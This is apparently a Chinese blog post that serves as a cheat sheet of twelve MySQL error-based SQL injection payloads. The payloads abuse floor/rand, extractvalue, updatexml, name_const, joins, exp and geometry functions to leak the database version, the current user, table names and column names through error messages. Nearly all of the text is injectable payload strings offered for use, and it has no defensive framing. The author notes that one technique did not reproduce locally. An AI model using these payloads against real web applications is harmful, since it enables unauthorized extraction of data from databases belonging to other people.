MySQL数据库的12种爆错注入

1.通过floor报错
and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);  

2.通过ExtractValue报错
and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));  

3.通过UpdateXml报错
and 1=(updatexml(1,concat(0x3a,(select user())),1))  

4.通过NAME_CONST报错
and exists(select * from (select * from(select name_const(version(),0))a join (select name_const(version(),0))b)c);  

5.通过join报错爆字段

注:该方法在知道表名的情况下使用

select * from (select * from 表名 a join 表名 b) c)  
在得到一个字段后,使用using得到下一个字段
select * from (select * from 表名 a join 表名 b using (已知的字段,已知的字段)) c  

6.通过exp报错
and exp(~(select * from (select user() ) a) );  

注:由于MYSQL的版本问题,这种方法在我本地未重现成功,截图来自百度

7.通过GeometryCollection()报错
and geometrycollection((select * from(select * from(select user())a)b));  

8.通过polygon()报错
and polygon((select * from(select * from(select user())a)b));  

9.通过multipoint()报错
and multipoint((select * from(select * from(select user())a)b));  

10.通过multlinestring()报错
and multilinestring((select * from(select * from(select user())a)b));  

11.通过multpolygon()报错
and multipolygon((select * from(select * from(select user())a)b));  

12.通过linestring()报错
and linestring((select * from(select * from(select user())a)b));  

zhutougg

继续阅读此作者的更多文章